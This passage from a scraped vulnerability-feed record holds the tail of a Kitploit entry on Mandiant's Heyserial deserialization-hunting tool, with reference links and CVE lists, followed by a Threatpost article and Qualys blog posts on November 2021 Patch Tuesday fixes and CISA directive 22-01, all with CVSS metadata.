[Ysoserial.NET](<https://github.com/pwntester/ysoserial.net> \"Ysoserial.NET\" ) and [v2 branch](<https://github.com/pwntester/ysoserial.net/tree/v2> \"v2 branch\" ) \\- @pwntester\n * [ViewGen](<https://github.com/0xacb/viewgen> \"ViewGen\" ) \u2013 0xacb\n * [Rogue-JNDI](<https://github.com/veracode-research/rogue-jndi> \"Rogue-JNDI\" ) \\- @veracode-research\n\nVulnerabilities\n\n * Log4J ([CVE-2021-44228](<https://www.lunasec.io/docs/blog/log4j-zero-day/> \"CVE-2021-44228\" ))\n * Exchange ([CVE-2021-42321](<https://vulners.com/cve/CVE-2021-42321> \"CVE-2021-42321\" ))\n * Zoho ManageEngine ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189> \"CVE-2020-10189\" ))\n * Jira ([CVE-2020-36239](<https://oxalis.io/atlassian-jira-data-centers-critical-vulnerability-what-you-need-to-know/> \"CVE-2020-36239\" ))\n * Telerik ([CVE-2019-18935](<https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui> \"CVE-2019-18935\" ))\n * C1 CMS ([CVE-2019-18211](<https://medium.com/@frycos/yet-another-net-deserialization-35f6ce048df7> \"CVE-2019-18211\" ))\n * Jenkins ([CVE-2016-9299](<https://nvd.nist.gov/vuln/detail/CVE-2016-9299> \"CVE-2016-9299\" ))\n * [What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.](<https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/> \"What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.\" ) \u2013 @breenmachine, FoxGloveSecurity (2015)\n\nTalks and Write-Ups\n\n * [PSA: Log4Shell and the current state of JNDI injection](<https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/> \"PSA: Log4Shell and the current state of JNDI injection\" ) \\- Moritz Bechler (2021)\n * [This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits> \"This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits\" ) \u2013 Chris Glyer, Dan Perez, Sarah Jones, Steve Miller (2020)\n * [Deep Dive into .NET ViewState deserialization and its exploitation](<https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817> \"Deep Dive into .NET ViewState deserialization and its exploitation\" ) \u2013 Swapneil Dash (2019)\n * [Exploiting ](<https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/> \"Exploiting\" )[Deserialization](<https://www.kitploit.com/search/label/Deserialization> \"Deserialization\" ) in ASP.NET via ViewState \u2013 Soroush Dalili (2019)\n * [Use of Deserialization in .NET Framework Methods and Classes](<https://research.nccgroup.com/wp-content/uploads/2020/07/whitepaper-new.pdf> \"Use of Deserialization in .NET Framework Methods and Classes\" ) \u2013 Soroush Dalili(2018)\n * [Friday the 13th, JSON Attacks](<https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf> \"Friday the 13th, JSON Attacks\" ) \u2013 Alvaro Mu\u00f1os and Oleksandr Mirosh (2017)\n * [Exploiting .NET Managed DCOM](<https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html> \"Exploiting .NET Managed DCOM\" ) \u2013 James Forshaw, Project Zero (2017)\n * [Java Unmarshaller Security](<https://github.com/frohoff/marshalsec/blob/master/marshalsec.pdf> \"Java Unmarshaller Security\" ) \u2013 Moritz Bechler (2017)\n * [Deserialize My Shorts](<https://www.slideshare.net/frohoff1/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization> \"Deserialize My Shorts\" ) \u2013 Chris Frohoff (2016)\n * [Pwning Your Java Messaging with Deserialization Vulnerabilities](<https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities-wp.pdf> \"Pwning Your Java Messaging with Deserialization Vulnerabilities\" ) \u2013 Matthias Kaiser (2016)\n * [Journey from JNDI/LDAP ](<https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf> \"Journey from JNDI/LDAP\" )[Manipulation](<https://www.kitploit.com/search/label/Manipulation> \"Manipulation\" ) to [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) Dream Land \u2013 Alvaro Mu\u00f1os and Oleksandr Mirosh (2016)\n * [Marshalling Pickles](<https://www.youtube.com/watch?v=KSA7vUkXGSg> \"Marshalling Pickles\" ) \u2013 Chris Frohoff and Gabriel Lawrence (2015)\n * [Are you my Type? Breaking .NET Through Serialization](<https://github.com/VulnerableGhost/.Net-Sterilized--Deserialization-Exploitation/blob/master/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf> \"Are you my Type? Breaking .NET Through Serialization\" ) \u2013 James Forshaw (2012)\n * [A Spirited Peek into ViewState](<https://deadliestwebattacks.com/2011/05/13/a-spirited-peek-into-viewstate-part-i/> \"A Spirited Peek into ViewState\" ) \u2013 Mike Shema (2011)\n\n \n\n\n**Author:** Alyssa Rahman @ramen0x3f\n\n**Created:** 2021-10-27\n\n**Last Updated:** 2021-12-02\n\n**Blog:** <https://www.mandiant.com/resources/hunting-deserialization-exploits>\n\nFor more details on this tool and the research process behind it, check out [our blog](<https://www.mandiant.com/resources/hunting-deserialization-exploits> \"our blog\" )!\n\n \n \n\n\n**[Download Heyserial](<https://github.com/mandiant/heyserial> \"Download Heyserial\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-12T21:30:00", "type": "kitploit", "title": "Heyserial - Programmatically Create Hunting Rules For Deserialization Exploitation With Multiple Keywords, Gadget Chains, Object Types, Encodings, And Rule Types", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299", "CVE-2019-18211", "CVE-2019-18935", "CVE-2020-10189", "CVE-2020-36239", "CVE-2021-42321", "CVE-2021-44228"], "modified": "2022-05-12T21:30:00", "id": "KITPLOIT:1207079539580982634", "href": "http://www.kitploit.com/2022/05/heyserial-programmatically-create.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-11-10T20:20:08", "description": "[Microsoft reported](<https://msrc.microsoft.com/update-guide/vulnerability>) a total of 55 vulnerabilities, six of which are rated critical, with the remaining 49 being rated important. The flaws are found in Microsoft Windows and Windows Components, Azure, Azure RTOS, Azure Sphere, Microsoft Dynamics, Microsoft Edge (Chromium-based), Exchange Server, Microsoft Office and Office Components, Windows Hyper-V, Windows Defender, and Visual Studio.\n\nAll in all, it\u2019s a pretty light month, according to the Zero Day Initiative\u2019s (ZDI\u2019s) Dustin Childs. \u201cHistorically speaking, 55 patches in November is a relatively low number,\u201d he commentd. \u201cEven going back to 2018 when there were only 691 CVEs fixed all year, there were more November CVEs.\u201d\n\nStill, as always, this Patch Tuesday delivers high-priority fixes, the most urgent of which being the duo that are under attack.\n\n## High-Priority, Actively Exploited Pair of Bugs\n\n[**CVE-2021-42321**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321>)**: Microsoft Exchange Server Remote Code Execution Vulnerability.**\n\nThis is a critical remote code execution (RCE) weakness in Exchange Server caused by issues with the validation of command-let (cmdlet) arguments \u2013 i.e., lightweight commands used in the PowerShell environment. They\u2019re invoked by PowerShell runtime within the context of automation scripts that are provided at the command line or invoked programmatically by the PowerShell runtime through APIs. Microsoft said that the vulnerability, rated 8.8 in criticality, has low attack complexity.\n\nIn order to exploit this flaw, an attacker would need to be authenticated, which limits some of the impact, as noted by Satnam Narang, staff research engineer at Tenable. Microsoft says they are aware of \u201climited targeted attacks\u201d using this vulnerability in the wild.\n\nMicrosoft has a[ blog post describing the vulnerabilit](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169>)y and how it\u2019s exploited.\n\nMicrosoft Exchange Server has been the subject of several notable vulnerabilities throughout 2021, including [ProxyLogon](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) and associated vulnerabilities as well as [ProxyShell](<https://threatpost.com/tortilla-exchange-servers-proxyshell/175967/>), Narang pointed out.\n\n[![Threatpost Webinar Promo Uptycs](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/10110941/Uptycs-November-Article-Promo.jpg)](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nClick to register for our LIVE event!\n\n\u201cThough unconfirmed, this may be similar to an Exchange Server vulnerability that was discovered at the [Tianfu Cup](<https://borncity.com/win/2021/10/17/tifanu-cup-2021-exchange-2019-und-iphone-gehackt/>) hacking competition last month,\u201d Narang suggested.\n\nKevin Breen, director of cyber threat research at Immersive Labs, told Threatpost on Tuesday that federal or government bodies in the United States may be bound by the recent [CISA directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) that puts an emphasis on faster patching of exploits that are actively being used by attackers. \u201cThis vulnerability \u2013 along with CVE-2021-42292 \u2013 would likely fall into that category,\u201d he noted in an email on Tuesday.\n\nIn spite of playing a starring role at the Tianfu Cup, this flaw was actually discovered by the Microsoft Threat Intelligence Center (MSTIC). Microsoft said that it\u2019s been actively used in attacks.\n\n[**CVE-2021-42292**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42292>)**: Microsoft Excel Security Feature Bypass Vulnerability.**\n\nThis patch fixes a security feature bypass vulnerability \u200b\u200bin Microsoft Excel for both Windows and MacOS computers that could allow code execution when opening a specially crafted file. It too was discovered by MSTIC, which said that it\u2019s also been exploited in the wild as a zero day.\n\nAccording to Trend Micro\u2019s Zero Day Initiative (ZDI) [November Security Update](<https://www.zerodayinitiative.com/blog/2021/11/9/the-november-2021-security-update-review>), \u201cThis is likely due to loading code that should be behind a prompt, but for whatever reason, that prompt does not appear, thus bypassing that security feature.\u201d\n\nMicrosoft doesn\u2019t suggest what effect the vulnerability might have, but its CVSS score of 7.8 gives it a severity rating of high. Immersive Labs\u2019 Breen said that the lack of detail \u201ccan make it hard to prioritize, but anything that is being exploited in the wild should be at the very top of your list to patch.\u201d\n\nMicrosoft said that the Outlook Preview Pane isn\u2019t an attack vector for this weakness, so a target would need to open the file in order for exploitation to occur.\n\nUpdates are available for Windows systems, but updates for Office for Mac aren\u2019t out yet.\n\nBreen suggested that given the lack of description and a lack of updates for a vulnerability being exploited in the wild, \u201cit may be worth telling anyone in your organization using Office for Mac to be more cautious until patches are made available.\u201d\n\n## Other Bugs of Note\n\n[**CVE-2021-42298**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42298>)**: Microsoft Defender Remote Code Execution Vulnerability.**\n\nDefender is designed to scan every file and run with some of the highest levels or privileges in the operating system. This means an attacker could trigger the exploit by simply sending a file \u2013 the victim wouldn\u2019t even need to open or run anything, explained Kevin Breen, director of cyber threat research at Immersive Labs.\n\nBreen told Threatpost on Tuesday that this is the reason that CVE-2021-42298 is marked as \u201cexploitation more likely.\u201d\n\n\u201cAs it\u2019s not being exploited in the wild, it should get updated without any manual intervention from administrators,\u201d he said via email. \u201cThat being said, it\u2019s definitely worth checking to make sure your Defender installations are getting their updates set correctly.\u201d\n\nMicrosoft\u2019s advisory includes steps to verify that users have the latest versions installed.\n\n[**CVE-2021-38666**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38666>)**: Remote Desktop Client Remote Code Execution Vulnerability.**\n\nMicrosoft said that in the case of a Remote Desktop connection, an attacker with control of a Remote Desktop Server could trigger an RCE on the RDP client machine when a victim connects to the attacking server with the vulnerable Remote Desktop Client.\n\nThat\u2019s not the clearest description, Breen noted, but the attack vector suggests that the remote desktop client installed on all supported versions of Windows contains a vulnerability.\n\n\u201cTo exploit it, an attacker would have to create their own server and convince a user to connect to the attacker,\u201d Breen explained. \u201cThere are several ways an attacker could do this, one of which could be to send the target an RDP shortcut file, either via email or a download. If the target opens this file, which in itself is not malicious, they could be giving the attacker access to their system.\u201d\n\nBreen said in an email that in addition to patching this flaw, a sensible step would be to add detections for RDP files being shared in emails or downloads.\n\n[**CVE-2021-38631**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38631>)** & **[**CVE-2021-41371**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41371>)**: Information Disclosure Vulnerabilities in Microsoft Remote Desktop Protocol (RDP).**\n\nThese flaws were previously publicly disclosed by security researchers. Successful exploitation of would allow an attacker to see RDP passwords for the vulnerable system.\n\nThe issue affects RDP running on Windows 7 \u2013 11 and Windows Server 2008 \u2013 2019. They\u2019re rated \u201cImportant\u201d by Microsoft. Given the interest that cybercriminals (especially ransomware initial access brokers) have in RDP, \u201cit is likely that it will be exploited at some point,\u201d said Allan Liska, senior security architect at Recorded Future.\n\n## Continuous Exchange Vulnerabilities\n\nExchange vulnerabilities have been of particular concern this year, Liska noted, pointing to both Chinese nation state actors and the cybercriminals behind the [DearCry](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) ransomware (also believed to be operating out of China) as having exploited earlier vulnerabilities in Microsoft Exchange ([CVE-2021-26855 and CVE-2021-27065](<https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/>)).\n\n\u201cWhile Microsoft only rates the vulnerability as \u2018Important\u2019 because an attacker has to be authenticated to exploit it, Recorded Future has noted that gaining legitimate credential access to Windows systems has become trivial for both nation state and cybercriminal actors,\u201d Liska said via email. Hence, he recommended prioritizing this flaw for patching.\n\n## Prioritize CVE-2021-42292, Too\n\nMicrosoft wasn\u2019t clear about which security feature is bypassed by this security feature bypass vulnerability for Microsoft Excel for both Windows and MacOS computers, which affects versions 2013 \u2013 2021. But the fact that it\u2019s being exploited in the wild \u201cis concerning,\u201d Liska said and \u201cmeans it should be prioritized for patching.\u201d\n\nMicrosoft Excel is a frequent target of both [nation-state attackers](<https://threatpost.com/spear-phishing-attack-lures-victims-with-hiv-results/153536/>) and cybercriminals, he noted.\n\n110921 17:21 UPDATE: Corrected misattribution of input from Kevin Breen.\n\n**_Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, _**[**_\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d_**](<https://bit.ly/3bBMX30>) **_on Wed., Nov. 17 at 2 p.m. ET. Brought to you by Specops._**\n\n[**_Register NOW_**](<https://bit.ly/3bBMX30>)**_ for the LIVE event and submit questions ahead of time to Threatpost\u2019s Becky Bracken at _**[**_becky.bracken@threatpost.com._**](<mailto:becky.bracken@threatpost.com>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-09T21:41:49", "type": "threatpost", "title": "Microsoft Nov. Patch Tuesday Fixes Six Zero-Days, 55 Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065", "CVE-2021-38631", "CVE-2021-38666", "CVE-2021-41371", "CVE-2021-42292", "CVE-2021-42298", "CVE-2021-42321"], "modified": "2021-11-09T21:41:49", "id": "THREATPOST:C23B7DE85B27B6A8707D0016592B87A3", "href": "https://threatpost.com/microsoft-nov-patch-tuesday-fixes-six-zero-days-55-bugs/176143/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-11-26T18:36:54", "description": "### **Microsoft Patch Tuesday \u2013 November 2021**\n\nMicrosoft patched 55 vulnerabilities in their November 2021 Patch Tuesday release, of which six are rated as critical severity and six were previously reported as zero-days.\n\n#### **Critical Microsoft Vulnerabilities Patched**\n\n[CVE-2021-42298](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42298>) - Microsoft Defender Remote Code Execution Vulnerability\n\nThis vulnerability in Microsoft Defender can be exploited using Maliciously crafted files. The remote code execution vulnerability will be triggered when the malicious file is opened by a user or scanned automatically via an outdated version of Microsoft Defender\n\n[CVE-2021-42279](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42279>) - Chakra Scripting Engine Memory Corruption Vulnerability\n\nThe Buffer Overflow vulnerability is because of a boundary error issue in Chakra Scripting Engine, which allows remote attackers to execute arbitrary code by initiating the memory corruption.\n\n[CVE-2021-42316](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42316>) - Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability\n\nThis vulnerability is a Remote Code Execution bug in on-prem Microsoft Dynamics 365 setups. There are very few public details regarding this vulnerability.\n\n[CVE-2021-26443](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26443>) - Microsoft Virtual Machine Bus (VMBus) Remote Code Execution Vulnerability\n\nThe vulnerability exists when a VM Guest fails to handle communication on a VMBus Channel. An authenticated user can exploit this vulnerability by sending a specially crafted communication on the VMBus Channel from the Guest to the Host, allowing the attacker to execute arbitrary code on the Host.\n\n[CVE-2021-3711](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-3711>) - OpenSSL: CVE-2021-3711 SM2 Decryption Buffer Overflow\n\nThis is a Buffer Overflow vulnerability in OpenSSL software which is embedded in Microsoft Visual Studio. The vulnerability was introduced due to a miscalculation in the buffer size in OpenSSL's SM2 function. An attacker can exploit this vulnerability to crash the application and potentially execute arbitrary code with the user's permission to run the application.\n\n[CVE-2021-38666](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38666>) - Remote Desktop Client Remote Code Execution Vulnerability\n\nThis vulnerability in Remote Desktop Clients can be exploited by an attacker who controls a Remote Desktop Server. The attacker can trick a user into connecting to the compromised/malicious Desktop Server, resulting in remote code execution.\n\n#### **Other High Priority Actively Exploited Vulnerabilities:**\n\n[CVE-2021-42321](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321>) - Microsoft Exchange Server Remote Code Execution Vulnerability\n\nThis is an actively exploited vulnerability that affects Microsoft Exchange Server 2019 and Microsoft Exchange Server 2016. This is a post-authentication vulnerability that allows code execution. Microsoft has additional details in a [public blog post](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169>).\n\n[CVE-2021-42292](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42292>) - Microsoft Excel Security Feature Bypass Vulnerability\n\nThe vulnerability in Microsoft Excel can be exploited using a Specially Crafted File, allowing an attacker to execute code. The vulnerability affects both Windows and macOS versions; a patch for the latter has not yet been released.\n\n#### **Following were the four of the six zero-day vulnerabilities:**\n\n[CVE-2021-43208](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43208>) \u2013 3D Viewer Remote Code Execution Vulnerability\n\n[CVE-2021-43209](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43209>) \u2013 3D Viewer Remote Code Execution Vulnerability\n\n[CVE-2021-38631](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38631>) \u2013 Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability\n\n[CVE-2021-41371](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41371>) \u2013 Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability\n\n### **Adobe Patch Tuesday \u2013 October 2021**\n\nAdobe addressed 4 CVEs this [Patch Tuesday](<https://helpx.adobe.com/security.html>), and 2 of them are rated as critical severity impacting RoboHelp Server, Adobe, and Adobe Creative Cloud.\n\n### **Discover Patch Tuesday Vulnerabilities in VMDR**\n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:(qid:`50116` OR qid:`50117` OR qid:`91831` OR qid:`91832` OR qid:`91833` OR qid:`91834` OR qid:`91835` OR qid:`91836` OR qid:`91837` OR qid:`110394` OR qid:`110395` OR qid:`376026`)\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/patch-tuesday-screenshot-1-1070x602.png)\n\n### **Respond by Patching**\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the "Missing" patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday.\n \n \n (qid:`50116` OR qid:`50117` OR qid:`91831` OR qid:`91832` OR qid:`91833` OR qid:`91834` OR qid:`91835` OR qid:`91836` OR qid:`91837` OR qid:`110394` OR qid:`110395` OR qid:`376026`)\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/patch-tuesday-screenshot-2-1070x602.png)\n\n### **Patch Tuesday Dashboard**\n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard.](<https://success.qualys.com/discussions/s/article/000006755>)\n\n#### **Webinar Series: This Month in Vulnerabilities and Patches**\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [This Month in Vulnerabilities and Patches](<https://event.on24.com/wcc/r/3509444/01AB8685B078D8E9469DE21953BD584F>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * Microsoft Patch Tuesday, November 2021\n * Adobe Patch Tuesday, November 2021\n\n[Join us live or watch on demand!](<https://event.on24.com/wcc/r/3509444/01AB8685B078D8E9469DE21953BD584F>)\n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture1-1.png)Thursday, November 11, 2021 or later on demand\n\n### **About Patch Tuesday**\n\nPatch Tuesday QIDs are published at Security Alerts, typically late in the evening of Patch Tuesday, followed shortly after by PT dashboards.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-11T01:07:53", "type": "qualysblog", "title": "Microsoft & Adobe Patch Tuesday (November 2021) \u2013 Microsoft 55 Vulnerabilities with 6 Critical, 6 Zero-Days. Adobe 4 Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26443", "CVE-2021-3711", "CVE-2021-38631", "CVE-2021-38666", "CVE-2021-41371", "CVE-2021-42279", "CVE-2021-42292", "CVE-2021-42298", "CVE-2021-42316", "CVE-2021-42321", "CVE-2021-43208", "CVE-2021-43209"], "modified": "2021-11-11T01:07:53", "id": "QUALYSBLOG:95B6925D28299FFFDEA3BD6BA8F3E443", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-Actual-1.jpg)\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-3.jpg)\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-4-scaled.jpg)\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many 